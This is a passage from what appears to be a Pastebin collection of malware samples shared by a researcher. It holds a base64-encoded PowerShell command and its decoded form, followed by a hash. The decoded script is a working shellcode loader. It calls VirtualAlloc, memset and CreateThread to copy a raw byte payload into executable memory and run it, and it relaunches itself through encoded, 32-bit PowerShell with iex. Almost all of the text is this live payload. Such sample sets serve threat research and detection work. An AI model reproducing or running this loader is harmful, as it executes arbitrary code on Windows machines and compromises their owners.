2ACwAMAB4ADMAMgAsADAAeABlADYALAAwAHgAMAA1ACwAMAB4AGMANwAsADAAeAAwADEALAAwAHgAMQA4ACwAMAB4AGQANgAsADAAeAA0AGUALAAwAHgAOAA1ACwAMAB4ADcAMgAsADAAeABkADIALAAwAHgAMAAwACwAMAB4ADIAZgAsADAAeAA5AGMALAAwAHgAOABjACwAMAB4AGMAOAAsADAAeABkAGEALAAwAHgAZQA0ACwAMAB4AGEAZQAsADAAeAA4AGYALAAwAHgAZABiACwAMAB4ADMAYwAsADAAeABmAGYALAAwAHgANwAwACwAMAB4ADcANAAsADAAeABlADgALAAwAHgANQA3ACwAMAB4AGQAOAAsADAAeAAyAGMALAAwAHgANwBlACwAMAB4ADcANQAsADAAeABlADAALAAwAHgAYwA4ACwAMAB4ADAANQAsADAAeAA3AGEALAAwAHgAMwA5ACwAMAB4ADYAZAAsADAAeAAzADkALAAwAHgAZgAxACwAMAB4AGQAYwAsADAAeAAyADYALAAwAHgAYgA1ACwAMAB4ADcAZQAsADAAeAA5AGIALAAwAHgAYgA4ACwAMAB4AGMAOQAsADAAeAA3AGUALAAwAHgAYgA3ACwAMAB4ADYAOQAsADAAeAAyADAALAAwAHgAZQBmACwAMAB4ADQANwAsADAAeAA4ADkALAAwAHgAYgAzACwAMAB4AGYAOAAsADAAeABlADQALAAwAHgANwA2ACwAMAB4ADQAYwAsADAAeAAwADcALAAwAHgAZABiACwAMAB4AGUAOQAsADAAeABkAGQALAAwAHgAOQBjACwAMAB4ADQANQAsADAAeAA4AGEALAAwAHgAMABmACwAMAB4ADMAOAAsADAAeABmAGUALAAwAHgAMgA5ACwAMAB4ADUAMAAsADAAeAAyADkALAAwAHgAOQA1ACwAMAB4ADgAMAAsADAAeAA5ADAALAAwAHgAZgAyACwAMAB4ADMAYQAsADAAeAA4ADgALAAwAHgAMQAyACwAMAB4ADYANwAsADAAeABiADkALAAwAHgAMQBjACwAMAB4ADcAOQAsADAAeAA3ADUALAAwAHgAZAA3ACwAMAB4ADkAZQAsADAAeAAyAGEALAAwAHgAMQAxACwAMAB4AGYAZAAsADAAeAA2ADgALAAwAHgAMABlACwAMAB4AGEAZQAsADAAeABmAGUALAAwAHgANAAxACwAMAB4ADMAYwAsADAAeAAwADAALAAwAHgAYwAxACwAMAB4ADAAZgAsADAAeABmAGIALAAwAHgANgA3ACwAMAB4AGMAMgAsADAAeABlADYALAAwAHgAMwBmACwAMAB4ADMAMwAsADAAeAA0ADkALAAwAHgAYgA0ACwAMAB4ADkAYgAsADAAeABiADQALAAwAHgANgAwACwAMAB4ADgANAAsADAAeAA1ADAALAAwAHgAYwA3ACwAMAB4AGQAMgAsADAAeAA1ADUALAAwAHgAYwBmACwAMAB4AGEAMAAsADAAeABjADAALAAwAHgAYwAzACwAMAB4ADYANgAsADAAeABkADIALAAwAHgAMQBhACwAMAB4ADMAZQAsADAAeABmAGQALAAwAHgAZAAzACwAMAB4ADkAMQAsADAAeABlAGQALAAwAHgAYQA2ACwAMAB4ADUANgAsADAAeAA5ADkALAAwAHgAOQA5ACwAMAB4ADQAMAAsADAAeAAzADMALAAwAHgAMQBhACwAMAB4ADMANQAsADAAeAAzAGQALAAwAHgANABlACwAMAB4ADUAZQAsADAAeAA5ADEALAAwAHgAYgAxACwAMAB4ADAAMAAsADAAeAAwAGMALAAwAHgAYgAxACwAMAB4AGUANAAsADAAeABmADcALAAwAHgAMQBjACwAMAB4ADEAYQAsADAAeAAwADgALAAwAHgAMgAyACwAMAB4AGUAMwAsADAAeAA3ADAALAAwAHgAZgAyACwAMAB4ADIANgAsADAAeAAyAGEALAAwAHgAZABiACwAMAB4ADkAMwAsADAAeAA3AGUALAAwAHgAMgA1ACwAMAB4ADUAYwAsADAAeAAzADEALAAwAHgAOAAwACwAMAB4ADkAZgAsADAAeAAwADgALAAwAHgAYgA2ACwAMAB4ADIAOQAsADAAeAA0ADgALAAwAHgAZgBkACwAMAB4ADMAZAAsADAAeABiAGEALAAwAHgAMABmACwAMAB4ADAAMgAsADAAeAA5ADQALAAwAHgAMgBmACwAMAB4ADEAMAAsADAAeAA5ADQALAAwAHgAZQA3ACwAMAB4ADAANQAsADAAeABiADIALAAwAHgAMwAyACwAMAB4AGYANwAsADAAeABiADMALAAwAHgANQBiACwAMAB4ADIAYQAsADAAeABmADgALAAwAHgAYwAzACwAMAB4ADYAMwAsADAAeAAwAGYALAAwAHgANwA1ACwAMAB4ADQAZQAsADAAeABmADMALAAwAHgAZgBkACwAMAB4ADIANgAsADAAeABlAGMALAAwAHgANwBlACwAMAB4ADYANgAsADAAeABmADcALAAwAHgAOQA2ACwAMAB4AGUAOQAsADAAeAAwADQALAAwAHgANgAyACwAMAB4ADUANwAsADAAeAAwADIALAAwAHgAZAAxACwAMAB4ADkAMwAsADAAeABhADgALAAwAHgAMgBkACwAMAB4AGIAZQAsADAAeAAwADYALAAwAHgAMwBkACwAMAB4AGIAMAAsADAAeAAyAGMALAAwAHgAYgA2ACwAMAB4AGEANgAsADAAeAAxAGEALAAwAHgAYwBmACwAMAB4ADIANwAsADAAeAA0ADQALAAwAHgANgAzADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABVAHUAVwA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAVQB1AFcALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFUAdQBXACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAWgBaAEwAdAApACkAOwAkAGkAegBQACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAcwBsAHcATwAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABzAGwAdwBPACAAJABpAHoAUAAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABpAHoAUAAgACQAZQAiADsAfQA= --> $ZZLt = '$9Wk = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $9Wk -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xba,0x84,0xbb,0x0f,0xcc,0xda,0xdd,0xd9,0x74,0x24,0xf4,0x58,0x31,0xc9,0xb1,0x6f,0x83,0xe8,0xfc,0x31,0x50,0x11,0x03,0x50,0x11,0xe2,0x71,0x47,0xe7,0x45,0x79,0xb8,0xf8,0x35,0xf0,0x5d,0xc9,0x67,0x66,0x15,0x78,0xb8,0xed,0x7b,0x71,0x33,0xa3,0x6f,0x02,0x31,0x6b,0x9f,0xa3,0xfc,0x4d,0xae,0x34,0x31,0x51,0x7c,0xf6,0x53,0x2d,0x7f,0x2b,0xb4,0x0c,0xb0,0x3e,0xb5,0x49,0xad,0xb1,0xe7,0x02,0xb9,0x60,0x18,0x27,0xff,0xb8,0x19,0xe7,0x8b,0x81,0x61,0x82,0x4c,0x75,0xd8,0x8d,0x9c,0x26,0x57,0xc5,0x04,0x4c,0x3f,0xf5,0x35,0x81,0x23,0xc9,0x7c,0xae,0x90,0xba,0x7e,0x66,0xe9,0x43,0xb1,0x46,0xa6,0x7a,0x7d,0x4b,0xb6,0xbb,0xba,0xb4,0xcd,0xb7,0xb8,0x49,0xd6,0x0c,0xc2,0x95,0x53,0x90,0x64,0x5d,0xc3,0x70,0x94,0xb2,0x92,0xf3,0x9a,0x7f,0xd0,0x5b,0xbf,0x7e,0x35,0xd0,0xbb,0x0b,0xb8,0x36,0x4a,0x4f,0x9f,0x92,0x16,0x0b,0xbe,0x83,0xf2,0xfa,0xbf,0xd3,0x5b,0xa2,0x65,0x98,0x4e,0xb7,0x1c,0xc3,0x06,0x29,0x44,0x8f,0xd6,0xdd,0xf1,0x06,0xb9,0x74,0x77,0x3e,0x11,0xef,0xcb,0xc9,0xbc,0xe8,0x2c,0xe0,0xf0,0x09,0x85,0x5d,0xa4,0xa2,0x7c,0x09,0x70,0x1b,0xf8,0x6e,0x7b,0x76,0x11,0x10,0xdf,0x48,0x2f,0x81,0x8e,0xc0,0xac,0x70,0x60,0x7f,0xe3,0x21,0xd2,0x17,0x54,0x4c,0x4d,0x21,0xa5,0x9b,0x99,0xe1,0x03,0x12,0x8c,0xac,0xdb,0x54,0x02,0x31,0x98,0x06,0x30,0xe3,0xf1,0xf4,0xe4,0x6b,0x19,0xad,0x2a,0x57,0x22,0x98,0xba,0x61,0xb6,0x32,0xe6,0x05,0xc7,0x01,0x18,0xd6,0x4e,0x85,0x72,0xd2,0x00,0x2f,0x9c,0x8c,0xc8,0xda,0xe4,0xae,0x8f,0xdb,0x3c,0xff,0x70,0x74,0xe8,0x57,0xd8,0x2c,0x7e,0x75,0xe0,0xc8,0x05,0x7a,0x39,0x6d,0x39,0xf1,0xdc,0x26,0xb5,0x7e,0x9b,0xb8,0xc9,0x7e,0xb7,0x69,0x20,0xef,0x47,0x89,0xb3,0xf8,0xe4,0x76,0x4c,0x07,0xdb,0xe9,0xdd,0x9c,0x45,0x8a,0x0f,0x38,0xfe,0x29,0x50,0x29,0x95,0x80,0x90,0xf2,0x3a,0x88,0x12,0x67,0xb9,0x1c,0x79,0x75,0xd7,0x9e,0x2a,0x11,0xfd,0x68,0x0e,0xae,0xfe,0x41,0x3c,0x00,0xc1,0x0f,0xfb,0x67,0xc2,0xe6,0x3f,0x33,0x49,0xb4,0x9b,0xb4,0x60,0x84,0x50,0xc7,0xd2,0x55,0xcf,0xa0,0xc0,0xc3,0x66,0xd2,0x1a,0x3e,0xfd,0xd3,0x91,0xed,0xa6,0x56,0x99,0x99,0x40,0x33,0x1a,0x35,0x3d,0x4e,0x5e,0x91,0xb1,0x00,0x0c,0xb1,0xe4,0xf7,0x1c,0x1a,0x08,0x22,0xe3,0x70,0xf2,0x26,0x2a,0xdb,0x93,0x7e,0x25,0x5c,0x31,0x80,0x9f,0x08,0xb6,0x29,0x48,0xfd,0x3d,0xba,0x0f,0x02,0x94,0x2f,0x10,0x94,0xe7,0x05,0xb2,0x32,0xf7,0xb3,0x5b,0x2a,0xf8,0xc3,0x63,0x0f,0x75,0x4e,0xf3,0xfd,0x26,0xec,0x7e,0x66,0xf7,0x96,0xe9,0x04,0x62,0x57,0x02,0xd1,0x93,0xa8,0x2d,0xbe,0x06,0x3d,0xb0,0x2c,0xb6,0xa6,0x1a,0xcf,0x27,0x44,0x63;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$UuW=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($UuW.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$UuW,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($ZZLt));$izP = "-enc ";if([IntPtr]::Size -eq 8){$slwO = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $slwO $izP $e"}else{;iex "& powershell $izP $e";}
  199. acbedcba51bfcd9743e0561fd8276f97b791174bc9152bd74d6ea4523f18cc70
  200. ###:END prepared by @JohnLaTwC
RAW Paste Data
Pastebin PRO Summer Special!
Get 40% OFF on Pastebin PRO accounts!
Top